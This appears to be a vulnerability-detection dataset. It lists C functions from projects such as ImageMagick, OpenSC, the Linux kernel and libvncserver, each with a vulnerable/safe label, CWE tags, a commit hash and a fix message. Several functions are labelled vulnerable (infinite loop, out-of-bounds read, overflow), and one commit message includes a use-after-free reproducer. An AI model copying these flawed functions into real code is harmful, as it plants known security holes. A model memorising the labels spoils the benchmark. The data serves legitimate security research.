Signed-off-by: David S. Miller <[email protected]>
|
static inline void ModulateHSB(const double percent_hue,
const double percent_saturation,const double percent_brightness,double *red,
double *green,double *blue)
{
double
brightness,
hue,
saturation;
/*
Increase or decrease color brightness, saturation, or hue.
*/
ConvertRGBToHSB(*red,*green,*blue,&hue,&saturation,&brightness);
hue+=0.5*(0.01*percent_hue-1.0);
while (hue < 0.0)
hue+=1.0;
while (hue > 1.0)
hue-=1.0;
saturation*=0.01*percent_saturation;
brightness*=0.01*percent_brightness;
ConvertHSBToRGB(hue,saturation,brightness,red,green,blue);
}
| 1 |
[
"CWE-835"
] |
ImageMagick
|
a80ee0ee1a083b4991d12ed4c07b7c7c5890f329
| 315,108,743,950,655,500,000,000,000,000,000,000,000 | 22 |
https://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=31506
|
CImg<T>& blur_guided(const CImg<t>& guide, const float radius, const float regularization) {
return get_blur_guided(guide,radius,regularization).move_to(*this);
}
| 0 |
[
"CWE-770"
] |
cimg
|
619cb58dd90b4e03ac68286c70ed98acbefd1c90
| 53,302,739,205,727,080,000,000,000,000,000,000,000 | 3 |
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file does not exceed file size.
|
g_tcp_can_recv(int sck, int millis)
{
fd_set rfds;
struct timeval time;
int rv;
time.tv_sec = millis / 1000;
time.tv_usec = (millis * 1000) % 1000000;
FD_ZERO(&rfds);
if (sck > 0)
{
FD_SET(((unsigned int)sck), &rfds);
rv = select(sck + 1, &rfds, 0, 0, &time);
if (rv > 0)
{
return g_tcp_socket_ok(sck);
}
}
return 0;
}
| 0 |
[] |
xrdp
|
d8f9e8310dac362bb9578763d1024178f94f4ecc
| 132,898,070,474,991,140,000,000,000,000,000,000,000 | 20 |
move temp files from /tmp to /tmp/.xrdp
|
static int rtecp_select_file(sc_card_t *card,
const sc_path_t *in_path, sc_file_t **file_out)
{
sc_file_t **file_out_copy, *file;
int r;
assert(card && card->ctx && in_path);
switch (in_path->type)
{
case SC_PATH_TYPE_DF_NAME:
case SC_PATH_TYPE_FROM_CURRENT:
case SC_PATH_TYPE_PARENT:
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_NORMAL, SC_ERROR_NOT_SUPPORTED);
}
assert(iso_ops && iso_ops->select_file);
file_out_copy = file_out;
r = iso_ops->select_file(card, in_path, file_out_copy);
if (r || file_out_copy == NULL)
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, r);
assert(file_out_copy);
file = *file_out_copy;
assert(file);
if (file->sec_attr && file->sec_attr_len == SC_RTECP_SEC_ATTR_SIZE)
set_acl_from_sec_attr(card, file);
else
r = SC_ERROR_UNKNOWN_DATA_RECEIVED;
if (r)
sc_file_free(file);
else
{
assert(file_out);
*file_out = file;
}
SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, r);
}
| 1 |
[
"CWE-125"
] |
OpenSC
|
8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
| 288,560,964,078,051,800,000,000,000,000,000,000,000 | 35 |
fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes.
|
ask_curve (int *algo, int both)
{
struct {
const char *name;
int available;
int expert_only;
int fix_curve;
const char *pretty_name;
} curves[] = {
#if GPG_USE_EDDSA
{ "Curve25519", 0, 0, 1, "Curve 25519" },
#endif
#if GPG_USE_ECDSA || GPG_USE_ECDH
{ "NIST P-256", 0, 1, 0, },
{ "NIST P-384", 0, 0, 0, },
{ "NIST P-521", 0, 1, 0, },
{ "brainpoolP256r1", 0, 1, 0, "Brainpool P-256" },
{ "brainpoolP384r1", 0, 1, 0, "Brainpool P-384" },
{ "brainpoolP512r1", 0, 1, 0, "Brainpool P-512" },
{ "secp256k1", 0, 1, 0 },
#endif
};
int idx;
char *answer;
char *result = NULL;
gcry_sexp_t keyparms;
tty_printf (_("Please select which elliptic curve you want:\n"));
again:
keyparms = NULL;
for (idx=0; idx < DIM(curves); idx++)
{
int rc;
curves[idx].available = 0;
if (!opt.expert && curves[idx].expert_only)
continue;
/* FIXME: The strcmp below is a temporary hack during
development. It shall be removed as soon as we have proper
Curve25519 support in Libgcrypt. */
gcry_sexp_release (keyparms);
rc = gcry_sexp_build (&keyparms, NULL,
"(public-key(ecc(curve %s)))",
(!strcmp (curves[idx].name, "Curve25519")
? "Ed25519" : curves[idx].name));
if (rc)
continue;
if (!gcry_pk_get_curve (keyparms, 0, NULL))
continue;
if (both && curves[idx].fix_curve)
{
/* Both Curve 25519 keys are to be created. Check that
Libgcrypt also supports the real Curve25519. */
gcry_sexp_release (keyparms);
rc = gcry_sexp_build (&keyparms, NULL,
"(public-key(ecc(curve %s)))",
curves[idx].name);
if (rc)
continue;
if (!gcry_pk_get_curve (keyparms, 0, NULL))
continue;
}
curves[idx].available = 1;
tty_printf (" (%d) %s\n", idx + 1,
curves[idx].pretty_name?
curves[idx].pretty_name:curves[idx].name);
}
gcry_sexp_release (keyparms);
for (;;)
{
answer = cpr_get ("keygen.curve", _("Your selection? "));
cpr_kill_prompt ();
idx = *answer? atoi (answer) : 1;
if (*answer && !idx)
{
/* See whether the user entered the name of the curve. */
for (idx=0; idx < DIM(curves); idx++)
{
if (!opt.expert && curves[idx].expert_only)
continue;
if (!stricmp (curves[idx].name, answer)
|| (curves[idx].pretty_name
&& !stricmp (curves[idx].pretty_name, answer)))
break;
}
if (idx == DIM(curves))
idx = -1;
}
else
idx--;
xfree(answer);
answer = NULL;
if (idx < 0 || idx >= DIM (curves) || !curves[idx].available)
tty_printf (_("Invalid selection.\n"));
else
{
if (curves[idx].fix_curve)
{
log_info ("WARNING: Curve25519 is not yet part of the"
" OpenPGP standard.\n");
if (!cpr_get_answer_is_yes("experimental_curve.override",
"Use this curve anyway? (y/N) ") )
goto again;
}
/* If the user selected a signing algorithm and Curve25519
we need to update the algo and and the curve name. */
if ((*algo == PUBKEY_ALGO_ECDSA || *algo == PUBKEY_ALGO_EDDSA)
&& curves[idx].fix_curve)
{
*algo = PUBKEY_ALGO_EDDSA;
result = xstrdup ("Ed25519");
}
else
result = xstrdup (curves[idx].name);
break;
}
}
if (!result)
result = xstrdup (curves[0].name);
return result;
}
| 0 |
[
"CWE-20"
] |
gnupg
|
2183683bd633818dd031b090b5530951de76f392
| 255,640,354,967,782,500,000,000,000,000,000,000,000 | 130 |
Use inline functions to convert buffer data to scalars.
* common/host2net.h (buf16_to_ulong, buf16_to_uint): New.
(buf16_to_ushort, buf16_to_u16): New.
(buf32_to_size_t, buf32_to_ulong, buf32_to_uint, buf32_to_u32): New.
--
Commit 91b826a38880fd8a989318585eb502582636ddd8 was not enough to
avoid all sign extension on shift problems. Hanno Böck found a case
with an invalid read due to this problem. To fix that once and for
all almost all uses of "<< 24" and "<< 8" are changed by this patch to
use an inline function from host2net.h.
Signed-off-by: Werner Koch <[email protected]>
|
static int nf_tables_delsetelem(struct sk_buff *skb,
const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_set *set;
struct nft_ctx ctx;
int rem, err = 0;
table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
genmask, NETLINK_CB(skb).portid);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
return PTR_ERR(table);
}
set = nft_set_lookup(table, nla[NFTA_SET_ELEM_LIST_SET], genmask);
if (IS_ERR(set))
return PTR_ERR(set);
if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
return -EBUSY;
nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
if (!nla[NFTA_SET_ELEM_LIST_ELEMENTS])
return nft_set_flush(&ctx, set, genmask);
nla_for_each_nested(attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_del_setelem(&ctx, set, attr);
if (err < 0)
break;
}
return err;
}
| 0 |
[] |
net
|
520778042ccca019f3ffa136dd0ca565c486cedd
| 305,164,351,860,862,040,000,000,000,000,000,000,000 | 39 |
netfilter: nf_tables: disallow non-stateful expression in sets earlier
Since 3e135cd499bf ("netfilter: nft_dynset: dynamic stateful expression
instantiation"), it is possible to attach stateful expressions to set
elements.
cd5125d8f518 ("netfilter: nf_tables: split set destruction in deactivate
and destroy phase") introduces conditional destruction on the object to
accomodate transaction semantics.
nft_expr_init() calls expr->ops->init() first, then check for
NFT_STATEFUL_EXPR, this stills allows to initialize a non-stateful
lookup expressions which points to a set, which might lead to UAF since
the set is not properly detached from the set->binding for this case.
Anyway, this combination is non-sense from nf_tables perspective.
This patch fixes this problem by checking for NFT_STATEFUL_EXPR before
expr->ops->init() is called.
The reporter provides a KASAN splat and a poc reproducer (similar to
those autogenerated by syzbot to report use-after-free errors). It is
unknown to me if they are using syzbot or if they use similar automated
tool to locate the bug that they are reporting.
For the record, this is the KASAN splat.
[ 85.431824] ==================================================================
[ 85.432901] BUG: KASAN: use-after-free in nf_tables_bind_set+0x81b/0xa20
[ 85.433825] Write of size 8 at addr ffff8880286f0e98 by task poc/776
[ 85.434756]
[ 85.434999] CPU: 1 PID: 776 Comm: poc Tainted: G W 5.18.0+ #2
[ 85.436023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Fixes: 0b2d8a7b638b ("netfilter: nf_tables: add helper functions for expression handling")
Reported-and-tested-by: Aaron Adams <[email protected]>
Signed-off-by: Pablo Neira Ayuso <[email protected]>
|
template<typename tc, typename t>
CImg<T>& draw_text(const int x0, const int y0,
const char *const text,
const int, const tc *const background_color,
const float opacity, const CImgList<t>& font, ...) {
if (!font) return *this;
CImg<charT> tmp(2048);
std::va_list ap; va_start(ap,font);
cimg_vsnprintf(tmp,tmp._width,text,ap); va_end(ap);
return _draw_text(x0,y0,tmp,(tc*)0,background_color,opacity,font,false);
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 278,585,486,350,780,800,000,000,000,000,000,000,000 | 10 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
void SFS_ObjectMethodCall(ScriptParser *parser)
{
if (parser->codec->LastError) return;
SFS_Expression(parser);
SFS_AddString(parser, ".");
SFS_Identifier(parser);
SFS_AddString(parser, "(");
SFS_Params(parser);
SFS_AddString(parser, ")");
}
| 1 |
[
"CWE-476"
] |
gpac
|
4e7736d7ec7bf64026daa611da951993bb42fdaf
| 291,170,795,989,873,960,000,000,000,000,000,000,000 | 10 |
fixed #2238
|
static struct sctp_auth_bytes *sctp_auth_create_key(__u32 key_len, gfp_t gfp)
{
struct sctp_auth_bytes *key;
/* Allocate the shared key */
key = kmalloc(sizeof(struct sctp_auth_bytes) + key_len, gfp);
if (!key)
return NULL;
key->len = key_len;
atomic_set(&key->refcnt, 1);
SCTP_DBG_OBJCNT_INC(keys);
return key;
}
| 1 |
[
"CWE-189"
] |
linux-2.6
|
30c2235cbc477d4629983d440cdc4f496fec9246
| 259,229,604,442,576,920,000,000,000,000,000,000,000 | 15 |
sctp: add verification checks to SCTP_AUTH_KEY option
The structure used for SCTP_AUTH_KEY option contains a
length that needs to be verfied to prevent buffer overflow
conditions. Spoted by Eugene Teo <[email protected]>.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
fifo_close(notify_fifo_t* fifo)
{
if (fifo->fd != -1) {
close(fifo->fd);
fifo->fd = -1;
}
if (fifo->created_fifo)
unlink(fifo->name);
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
keepalived
|
04f2d32871bb3b11d7dc024039952f2fe2750306
| 67,086,455,157,553,780,000,000,000,000,000,000,000 | 9 |
When opening files for write, ensure they aren't symbolic links
Issue #1048 identified that if, for example, a non privileged user
created a symbolic link from /etc/keepalvied.data to /etc/passwd,
writing to /etc/keepalived.data (which could be invoked via DBus)
would cause /etc/passwd to be overwritten.
This commit stops keepalived writing to pathnames where the ultimate
component is a symbolic link, by setting O_NOFOLLOW whenever opening
a file for writing.
This might break some setups, where, for example, /etc/keepalived.data
was a symbolic link to /home/fred/keepalived.data. If this was the case,
instead create a symbolic link from /home/fred/keepalived.data to
/tmp/keepalived.data, so that the file is still accessible via
/home/fred/keepalived.data.
There doesn't appear to be a way around this backward incompatibility,
since even checking if the pathname is a symbolic link prior to opening
for writing would create a race condition.
Signed-off-by: Quentin Armitage <[email protected]>
|
static void load_tree(struct tree_entry *root)
{
unsigned char *sha1 = root->versions[1].sha1;
struct object_entry *myoe;
struct tree_content *t;
unsigned long size;
char *buf;
const char *c;
root->tree = t = new_tree_content(8);
if (is_null_sha1(sha1))
return;
myoe = find_object(sha1);
if (myoe && myoe->pack_id != MAX_PACK_ID) {
if (myoe->type != OBJ_TREE)
die("Not a tree: %s", sha1_to_hex(sha1));
t->delta_depth = myoe->depth;
buf = gfi_unpack_entry(myoe, &size);
if (!buf)
die("Can't load tree %s", sha1_to_hex(sha1));
} else {
enum object_type type;
buf = read_sha1_file(sha1, &type, &size);
if (!buf || type != OBJ_TREE)
die("Can't load tree %s", sha1_to_hex(sha1));
}
c = buf;
while (c != (buf + size)) {
struct tree_entry *e = new_tree_entry();
if (t->entry_count == t->entry_capacity)
root->tree = t = grow_tree_content(t, t->entry_count);
t->entries[t->entry_count++] = e;
e->tree = NULL;
c = get_mode(c, &e->versions[1].mode);
if (!c)
die("Corrupt mode in %s", sha1_to_hex(sha1));
e->versions[0].mode = e->versions[1].mode;
e->name = to_atom(c, strlen(c));
c += e->name->str_len + 1;
hashcpy(e->versions[0].sha1, (unsigned char *)c);
hashcpy(e->versions[1].sha1, (unsigned char *)c);
c += 20;
}
free(buf);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
git
|
34fa79a6cde56d6d428ab0d3160cb094ebad3305
| 155,325,209,967,351,500,000,000,000,000,000,000,000 | 49 |
prefer memcpy to strcpy
When we already know the length of a string (e.g., because
we just malloc'd to fit it), it's nicer to use memcpy than
strcpy, as it makes it more obvious that we are not going to
overflow the buffer (because the size we pass matches the
size in the allocation).
This also eliminates calls to strcpy, which make auditing
the code base harder.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
pkinit_fini_req_crypto(pkinit_req_crypto_context req_cryptoctx)
{
if (req_cryptoctx == NULL)
return;
pkiDebug("%s: freeing ctx at %p\n", __FUNCTION__, req_cryptoctx);
if (req_cryptoctx->dh != NULL)
DH_free(req_cryptoctx->dh);
if (req_cryptoctx->received_cert != NULL)
X509_free(req_cryptoctx->received_cert);
free(req_cryptoctx);
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
krb5
|
fbb687db1088ddd894d975996e5f6a4252b9a2b4
| 209,654,669,565,724,760,000,000,000,000,000,000,000 | 13 |
Fix PKINIT cert matching data construction
Rewrite X509_NAME_oneline_ex() and its call sites to use dynamic
allocation and to perform proper error checking.
ticket: 8617
target_version: 1.16
target_version: 1.15-next
target_version: 1.14-next
tags: pullup
|
webSocketsHandshake(rfbClientPtr cl, char *scheme)
{
char *buf, *response, *line;
int n, linestart = 0, len = 0, llen, base64 = TRUE;
char prefix[5], trailer[17];
char *path = NULL, *host = NULL, *origin = NULL, *protocol = NULL;
char *key1 = NULL, *key2 = NULL, *key3 = NULL;
char *sec_ws_origin = NULL;
char *sec_ws_key = NULL;
char sec_ws_version = 0;
ws_ctx_t *wsctx = NULL;
buf = (char *) malloc(WEBSOCKETS_MAX_HANDSHAKE_LEN);
if (!buf) {
rfbLogPerror("webSocketsHandshake: malloc");
return FALSE;
}
response = (char *) malloc(WEBSOCKETS_MAX_HANDSHAKE_LEN);
if (!response) {
free(buf);
rfbLogPerror("webSocketsHandshake: malloc");
return FALSE;
}
while (len < WEBSOCKETS_MAX_HANDSHAKE_LEN-1) {
if ((n = rfbReadExactTimeout(cl, buf+len, 1,
WEBSOCKETS_CLIENT_SEND_WAIT_MS)) <= 0) {
if ((n < 0) && (errno == ETIMEDOUT)) {
break;
}
if (n == 0)
rfbLog("webSocketsHandshake: client gone\n");
else
rfbLogPerror("webSocketsHandshake: read");
free(response);
free(buf);
return FALSE;
}
len += 1;
llen = len - linestart;
if (((llen >= 2)) && (buf[len-1] == '\n')) {
line = buf+linestart;
if ((llen == 2) && (strncmp("\r\n", line, 2) == 0)) {
if (key1 && key2) {
if ((n = rfbReadExact(cl, buf+len, 8)) <= 0) {
if ((n < 0) && (errno == ETIMEDOUT)) {
break;
}
if (n == 0)
rfbLog("webSocketsHandshake: client gone\n");
else
rfbLogPerror("webSocketsHandshake: read");
free(response);
free(buf);
return FALSE;
}
rfbLog("Got key3\n");
key3 = buf+len;
len += 8;
} else {
buf[len] = '\0';
}
break;
} else if ((llen >= 16) && ((strncmp("GET ", line, min(llen,4))) == 0)) {
/* 16 = 4 ("GET ") + 1 ("/.*") + 11 (" HTTP/1.1\r\n") */
path = line+4;
buf[len-11] = '\0'; /* Trim trailing " HTTP/1.1\r\n" */
cl->wspath = strdup(path);
/* rfbLog("Got path: %s\n", path); */
} else if ((strncasecmp("host: ", line, min(llen,6))) == 0) {
host = line+6;
buf[len-2] = '\0';
/* rfbLog("Got host: %s\n", host); */
} else if ((strncasecmp("origin: ", line, min(llen,8))) == 0) {
origin = line+8;
buf[len-2] = '\0';
/* rfbLog("Got origin: %s\n", origin); */
} else if ((strncasecmp("sec-websocket-key1: ", line, min(llen,20))) == 0) {
key1 = line+20;
buf[len-2] = '\0';
/* rfbLog("Got key1: %s\n", key1); */
} else if ((strncasecmp("sec-websocket-key2: ", line, min(llen,20))) == 0) {
key2 = line+20;
buf[len-2] = '\0';
/* rfbLog("Got key2: %s\n", key2); */
/* HyBI */
} else if ((strncasecmp("sec-websocket-protocol: ", line, min(llen,24))) == 0) {
protocol = line+24;
buf[len-2] = '\0';
rfbLog("Got protocol: %s\n", protocol);
} else if ((strncasecmp("sec-websocket-origin: ", line, min(llen,22))) == 0) {
sec_ws_origin = line+22;
buf[len-2] = '\0';
} else if ((strncasecmp("sec-websocket-key: ", line, min(llen,19))) == 0) {
sec_ws_key = line+19;
buf[len-2] = '\0';
} else if ((strncasecmp("sec-websocket-version: ", line, min(llen,23))) == 0) {
sec_ws_version = strtol(line+23, NULL, 10);
buf[len-2] = '\0';
}
linestart = len;
}
}
if (!(path && host && (origin || sec_ws_origin))) {
rfbErr("webSocketsHandshake: incomplete client handshake\n");
free(response);
free(buf);
return FALSE;
}
if ((protocol) && (strstr(protocol, "binary"))) {
if (! sec_ws_version) {
rfbErr("webSocketsHandshake: 'binary' protocol not supported with Hixie\n");
free(response);
free(buf);
return FALSE;
}
rfbLog(" - webSocketsHandshake: using binary/raw encoding\n");
base64 = FALSE;
protocol = "binary";
} else {
rfbLog(" - webSocketsHandshake: using base64 encoding\n");
base64 = TRUE;
if ((protocol) && (strstr(protocol, "base64"))) {
protocol = "base64";
} else {
protocol = "";
}
}
/*
* Generate the WebSockets server response based on the the headers sent
* by the client.
*/
if (sec_ws_version) {
char accept[B64LEN(SHA1_HASH_SIZE) + 1];
rfbLog(" - WebSockets client version hybi-%02d\n", sec_ws_version);
webSocketsGenSha1Key(accept, sizeof(accept), sec_ws_key);
if(strlen(protocol) > 0)
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HYBI, accept, protocol);
else
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HYBI_NO_PROTOCOL, accept);
} else {
/* older hixie handshake, this could be removed if
* a final standard is established */
if (!(key1 && key2 && key3)) {
rfbLog(" - WebSockets client version hixie-75\n");
prefix[0] = '\0';
trailer[0] = '\0';
} else {
rfbLog(" - WebSockets client version hixie-76\n");
snprintf(prefix, 5, "Sec-");
webSocketsGenMd5(trailer, key1, key2, key3);
}
len = snprintf(response, WEBSOCKETS_MAX_HANDSHAKE_LEN,
SERVER_HANDSHAKE_HIXIE, prefix, origin, prefix, scheme,
host, path, prefix, protocol, trailer);
}
if (rfbWriteExact(cl, response, len) < 0) {
rfbErr("webSocketsHandshake: failed sending WebSockets response\n");
free(response);
free(buf);
return FALSE;
}
/* rfbLog("webSocketsHandshake: %s\n", response); */
free(response);
free(buf);
wsctx = calloc(1, sizeof(ws_ctx_t));
if (sec_ws_version) {
wsctx->version = WEBSOCKETS_VERSION_HYBI;
wsctx->encode = webSocketsEncodeHybi;
wsctx->decode = webSocketsDecodeHybi;
} else {
wsctx->version = WEBSOCKETS_VERSION_HIXIE;
wsctx->encode = webSocketsEncodeHixie;
wsctx->decode = webSocketsDecodeHixie;
}
wsctx->base64 = base64;
hybiDecodeCleanup(wsctx);
cl->wsctx = (wsCtx *)wsctx;
return TRUE;
}
| 0 |
[
"CWE-787"
] |
libvncserver
|
aac95a9dcf4bbba87b76c72706c3221a842ca433
| 272,130,371,408,637,680,000,000,000,000,000,000,000 | 192 |
fix overflow and refactor websockets decode (Hybi)
fix critical heap-based buffer overflow which allowed easy modification
of a return address via an overwritten function pointer
fix bug causing connections to fail due a "one websocket frame = one
ws_read" assumption, which failed with LibVNCServer-0.9.11
refactor websocket Hybi decode to use a simple state machine for
decoding of websocket frames
|
int read_line(char *buf, int size)
{
char c, UNINIT_VAR(last_quote), last_char= 0;
char *p= buf, *buf_end= buf + size - 1;
int skip_char= 0;
my_bool have_slash= FALSE;
enum {R_NORMAL, R_Q, R_SLASH_IN_Q,
R_COMMENT, R_LINE_START} state= R_LINE_START;
DBUG_ENTER("read_line");
start_lineno= cur_file->lineno;
DBUG_PRINT("info", ("Starting to read at lineno: %d", start_lineno));
for (; p < buf_end ;)
{
skip_char= 0;
c= my_getc(cur_file->file);
if (feof(cur_file->file))
{
found_eof:
if (cur_file->file != stdin)
{
fclose(cur_file->file);
cur_file->file= 0;
}
my_free(cur_file->file_name);
cur_file->file_name= 0;
if (cur_file == file_stack)
{
/* We're back at the first file, check if
all { have matching }
*/
if (cur_block != block_stack)
die("Missing end of block");
*p= 0;
DBUG_PRINT("info", ("end of file at line %d", cur_file->lineno));
DBUG_RETURN(1);
}
cur_file--;
start_lineno= cur_file->lineno;
continue;
}
if (c == '\n')
{
/* Line counting is independent of state */
cur_file->lineno++;
/* Convert cr/lf to lf */
if (p != buf && *(p-1) == '\r')
p--;
}
switch(state) {
case R_NORMAL:
if (end_of_query(c))
{
*p= 0;
DBUG_PRINT("exit", ("Found delimiter '%s' at line %d",
delimiter, cur_file->lineno));
DBUG_RETURN(0);
}
else if ((c == '{' &&
(!my_strnncoll_simple(charset_info, (const uchar*) "while", 5,
(uchar*) buf, min(5, p - buf), 0) ||
!my_strnncoll_simple(charset_info, (const uchar*) "if", 2,
(uchar*) buf, min(2, p - buf), 0))))
{
/* Only if and while commands can be terminated by { */
*p++= c;
*p= 0;
DBUG_PRINT("exit", ("Found '{' indicating start of block at line %d",
cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '\'' || c == '"' || c == '`')
{
if (! have_slash)
{
last_quote= c;
state= R_Q;
}
}
have_slash= (c == '\\');
break;
case R_COMMENT:
if (c == '\n')
{
/* Comments are terminated by newline */
*p= 0;
DBUG_PRINT("exit", ("Found newline in comment at line: %d",
cur_file->lineno));
DBUG_RETURN(0);
}
break;
case R_LINE_START:
if (c == '#' || c == '-')
{
/* A # or - in the first position of the line - this is a comment */
state = R_COMMENT;
}
else if (my_isspace(charset_info, c))
{
if (c == '\n')
{
if (last_char == '\n')
{
/* Two new lines in a row, return empty line */
DBUG_PRINT("info", ("Found two new lines in a row"));
*p++= c;
*p= 0;
DBUG_RETURN(0);
}
/* Query hasn't started yet */
start_lineno= cur_file->lineno;
DBUG_PRINT("info", ("Query hasn't started yet, start_lineno: %d",
start_lineno));
}
/* Skip all space at begining of line */
skip_char= 1;
}
else if (end_of_query(c))
{
*p= 0;
DBUG_PRINT("exit", ("Found delimiter '%s' at line: %d",
delimiter, cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '}')
{
/* A "}" need to be by itself in the begining of a line to terminate */
*p++= c;
*p= 0;
DBUG_PRINT("exit", ("Found '}' in begining of a line at line: %d",
cur_file->lineno));
DBUG_RETURN(0);
}
else if (c == '\'' || c == '"' || c == '`')
{
last_quote= c;
state= R_Q;
}
else
state= R_NORMAL;
break;
case R_Q:
if (c == last_quote)
state= R_NORMAL;
else if (c == '\\')
state= R_SLASH_IN_Q;
break;
case R_SLASH_IN_Q:
state= R_Q;
break;
}
last_char= c;
if (!skip_char)
{
/* Could be a multibyte character */
/* This code is based on the code in "sql_load.cc" */
#ifdef USE_MB
int charlen = my_mbcharlen(charset_info, (unsigned char) c);
/* We give up if multibyte character is started but not */
/* completed before we pass buf_end */
if ((charlen > 1) && (p + charlen) <= buf_end)
{
int i;
char* mb_start = p;
*p++ = c;
for (i= 1; i < charlen; i++)
{
c= my_getc(cur_file->file);
if (feof(cur_file->file))
goto found_eof;
*p++ = c;
}
if (! my_ismbchar(charset_info, mb_start, p))
{
/* It was not a multiline char, push back the characters */
/* We leave first 'c', i.e. pretend it was a normal char */
while (p-1 > mb_start)
my_ungetc(*--p);
}
}
else
#endif
*p++= c;
}
}
die("The input buffer is too small for this query.x\n" \
"check your query or increase MAX_QUERY and recompile");
DBUG_RETURN(0);
}
| 0 |
[
"CWE-295"
] |
mysql-server
|
b3e9211e48a3fb586e88b0270a175d2348935424
| 142,270,015,796,639,350,000,000,000,000,000,000,000 | 205 |
WL#9072: Backport WL#8785 to 5.5
|
static int is_self_cloned(void)
{
int fd, ret, is_cloned = 0;
fd = open("/proc/self/exe", O_RDONLY|O_CLOEXEC);
if (fd < 0)
return -ENOTRECOVERABLE;
#ifdef HAVE_MEMFD_CREATE
ret = fcntl(fd, F_GET_SEALS);
is_cloned = (ret == RUNC_MEMFD_SEALS);
#else
struct stat statbuf = {0};
ret = fstat(fd, &statbuf);
if (ret >= 0)
is_cloned = (statbuf.st_nlink == 0);
#endif
close(fd);
return is_cloned;
}
| 0 |
[
"CWE-78",
"CWE-216"
] |
runc
|
0a8e4117e7f715d5fbeef398405813ce8e88558b
| 188,370,125,591,670,300,000,000,000,000,000,000,000 | 20 |
nsenter: clone /proc/self/exe to avoid exposing host binary to container
There are quite a few circumstances where /proc/self/exe pointing to a
pretty important container binary is a _bad_ thing, so to avoid this we
have to make a copy (preferably doing self-clean-up and not being
writeable).
We require memfd_create(2) -- though there is an O_TMPFILE fallback --
but we can always extend this to use a scratch MNT_DETACH overlayfs or
tmpfs. The main downside to this approach is no page-cache sharing for
the runc binary (which overlayfs would give us) but this is far less
complicated.
This is only done during nsenter so that it happens transparently to the
Go code, and any libcontainer users benefit from it. This also makes
ExtraFiles and --preserve-fds handling trivial (because we don't need to
worry about it).
Fixes: CVE-2019-5736
Co-developed-by: Christian Brauner <[email protected]>
Signed-off-by: Aleksa Sarai <[email protected]>
|
static void con_flush(struct vc_data *vc, unsigned long draw_from,
unsigned long draw_to, int *draw_x)
{
if (*draw_x < 0)
return;
vc->vc_sw->con_putcs(vc, (u16 *)draw_from,
(u16 *)draw_to - (u16 *)draw_from, vc->vc_y, *draw_x);
*draw_x = -1;
}
| 0 |
[
"CWE-416",
"CWE-362"
] |
linux
|
ca4463bf8438b403596edd0ec961ca0d4fbe0220
| 37,163,782,504,220,547,000,000,000,000,000,000,000 | 10 |
vt: vt_ioctl: fix VT_DISALLOCATE freeing in-use virtual console
The VT_DISALLOCATE ioctl can free a virtual console while tty_release()
is still running, causing a use-after-free in con_shutdown(). This
occurs because VT_DISALLOCATE considers a virtual console's
'struct vc_data' to be unused as soon as the corresponding tty's
refcount hits 0. But actually it may be still being closed.
Fix this by making vc_data be reference-counted via the embedded
'struct tty_port'. A newly allocated virtual console has refcount 1.
Opening it for the first time increments the refcount to 2. Closing it
for the last time decrements the refcount (in tty_operations::cleanup()
so that it happens late enough), as does VT_DISALLOCATE.
Reproducer:
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/ioctl.h>
#include <unistd.h>
int main()
{
if (fork()) {
for (;;)
close(open("/dev/tty5", O_RDWR));
} else {
int fd = open("/dev/tty10", O_RDWR);
for (;;)
ioctl(fd, VT_DISALLOCATE, 5);
}
}
KASAN report:
BUG: KASAN: use-after-free in con_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278
Write of size 8 at addr ffff88806a4ec108 by task syz_vt/129
CPU: 0 PID: 129 Comm: syz_vt Not tainted 5.6.0-rc2 #11
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
Call Trace:
[...]
con_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278
release_tty+0xa8/0x410 drivers/tty/tty_io.c:1514
tty_release_struct+0x34/0x50 drivers/tty/tty_io.c:1629
tty_release+0x984/0xed0 drivers/tty/tty_io.c:1789
[...]
Allocated by task 129:
[...]
kzalloc include/linux/slab.h:669 [inline]
vc_allocate drivers/tty/vt/vt.c:1085 [inline]
vc_allocate+0x1ac/0x680 drivers/tty/vt/vt.c:1066
con_install+0x4d/0x3f0 drivers/tty/vt/vt.c:3229
tty_driver_install_tty drivers/tty/tty_io.c:1228 [inline]
tty_init_dev+0x94/0x350 drivers/tty/tty_io.c:1341
tty_open_by_driver drivers/tty/tty_io.c:1987 [inline]
tty_open+0x3ca/0xb30 drivers/tty/tty_io.c:2035
[...]
Freed by task 130:
[...]
kfree+0xbf/0x1e0 mm/slab.c:3757
vt_disallocate drivers/tty/vt/vt_ioctl.c:300 [inline]
